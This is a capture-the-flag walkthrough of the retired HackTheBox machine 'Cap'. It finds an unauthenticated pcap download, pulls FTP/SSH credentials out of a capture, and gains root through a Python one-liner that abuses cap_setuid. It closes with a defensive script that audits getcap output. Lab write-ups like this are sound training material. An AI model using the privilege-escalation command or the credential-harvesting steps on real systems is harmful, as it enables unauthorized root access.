HackTheBox - Cap



OS     Difficulty  IP Address    Status
Linux  Easy        10.10.10.245  Retired

This box is classified as easy, but we at CovertBay decided to classify it as super easy, thanks to InfosecJack on HackTheBox. The web application page has no authentication of any kind and lets us download packet capture files (.pcap) which, when analyzed, reveal an FTP username and password that are also the credentials for SSH. Once logged in, as this box’s name suggests, the privilege escalation path is via Linux capabilities.

Phase 1 - Enumeration

Nmap

As usual, we start off with an nmap scan to identify open ports.

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    gunicorn
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Tue, 09 Nov 2021 19:10:40 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you 

...[snip]...

We see three open ports: (i) FTP, (ii) SSH, (iii) HTTPd (gunicorn).

Port 80

Navigating to the webpage on port 80, we get a dashboard right away, which is odd because usually there would be a login of some kind.


Navigating to the sidebar of the dashboard, we notice “Security Snapshot”:


This /data page allows us to download packet capture files, which we can analyze in Wireshark. Playing with the ID numbers of /data, we find at /data/0 a pcap with more captured packets than the rest; let’s download and analyze it.


Phase 2 - Exploitation

PCAP Analysis with Wireshark

Opening the packet capture file in Wireshark to analyze:

wireshark 0.pcap

Analyzing the .pcap file, we find FTP credentials:

username:	nathan
password:	Buck3tH4TF0RM3!

Since we know these are FTP credentials and SSH is running too, let’s try them on SSH before FTP. It works: we get in as the user nathan and get the user flag.

Phase 3 - Privilege Escalation

Linux Capabilities

Linux capabilities provide a subset of the available root privileges to a process.

So, as the user nathan, let’s run getcap to recursively search the filesystem for files that have capabilities set:

nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
nathan@cap:~$ 

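We notice Python right off the bat: /usr/bin/python3.8 carries cap_setuid, so the interpreter is allowed to change its own UID to 0. That means we can simply run a Python command to give us a root shell: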

nathan@cap:~$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'
root@cap:~# id
uid=0(root) gid=1001(nathan) groups=1001(nathan)
root@cap:~# 

And we have rooted the box. This box may be easy, but it is good practice for remembering privilege escalation techniques with Linux capabilities.
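From the defender's side, the same getcap listing can be audited automatically. The following is an added example, not part of the original write-up: it parses getcap output (the lines shown above, plus one constructed line in the `path caps=flags` layout that newer libcap releases print) and flags files whose permitted set holds a root-equivalent capability. The capability list, the interpreter name list and the `/opt/tools/backup-agent` path are assumptions of this example.

```python
import re

# Capabilities that amount to root when granted to a general-purpose binary.
# This selection is the example's assumption, not an exhaustive list.
ROOT_EQUIVALENT = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace",
    "cap_sys_module", "cap_dac_override", "cap_dac_read_search", "cap_chown",
}
# Binaries that run arbitrary user-supplied code (name list is an assumption).
INTERPRETER = re.compile(r"/(python|perl|ruby|php|node|lua|bash|dash|gdb)[\d.]*$")
CLAUSE = re.compile(r"^([a-z0-9_,]+)[=+]([eip]+)$")

# getcap output copied from the write-up, plus one constructed line in the
# "path caps=flags" layout that newer libcap releases print.
SAMPLE = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/opt/tools/backup-agent cap_dac_read_search=ep
"""

def parse_line(line):
    """Return (path, caps, flags) for one getcap line, or None if unparseable."""
    sep = " = " if " = " in line else " "
    path, _, clause = line.strip().rpartition(sep)
    m = CLAUSE.match(clause)
    if not path or not m:
        return None
    return path, set(m.group(1).split(",")), m.group(2)

def audit(getcap_output):
    """Return sorted (severity, path, caps) findings for root-equivalent grants."""
    findings = []
    for line in getcap_output.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        path, caps, flags = parsed
        risky = sorted(caps & ROOT_EQUIVALENT)
        if not risky or "p" not in flags:  # skip grants not in the permitted set
            continue
        severity = "critical" if INTERPRETER.search(path) else "high"
        findings.append((severity, path, risky))
    return sorted(findings)

if __name__ == "__main__":
    for severity, path, caps in audit(SAMPLE):
        print(f"{severity:8} {path}  {','.join(caps)}")
```

On a real host, feed it the output of `getcap -r / 2>/dev/null`; a finding such as the python3.8 one is cleared by removing the file capability with `setcap -r /usr/bin/python3.8`.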